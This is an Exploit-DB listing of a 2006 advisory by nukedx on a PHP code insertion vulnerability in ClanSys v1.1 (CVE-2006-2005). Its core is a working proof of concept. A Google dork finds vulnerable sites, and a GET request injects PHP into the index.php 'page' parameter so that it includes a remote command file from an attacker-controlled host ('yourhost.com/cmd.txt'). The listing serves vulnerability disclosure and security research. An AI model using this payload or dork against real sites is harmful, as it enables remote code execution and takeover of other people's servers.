Clansys <= v.1.1 (index.php page) PHP Code Insertion Vulnerability



EDB-ID: 1710 CVE: 2006-2005 OSVDB-ID: 25083
Author: nukedx Published: 2006-04-23 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next 
NukedX Security Advisory Nr 2006-29
ClanSys v1.1 (index.php page) PHP Code Insertion Vulnerability
Method found & Exploit scripted by nukedx
Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
Original advisory: http://www.nukedx.com/?viewdoc=29
Dork: "ClanSys v.1.1" 2.400 pages.
Full PoC ->
GET -> http://[victim]/[ClanSysPath]/index.php?page=[PHPCode]
EXAMPLE -> http://[victim]/[ClanSysPath]/index.php?page=<?include($s);?>&s=http://yourhost.com/cmd.txt?

# nukedx.com [2006-04-23]

# milw0rm.com [2006-04-23]






Comments

No comments so far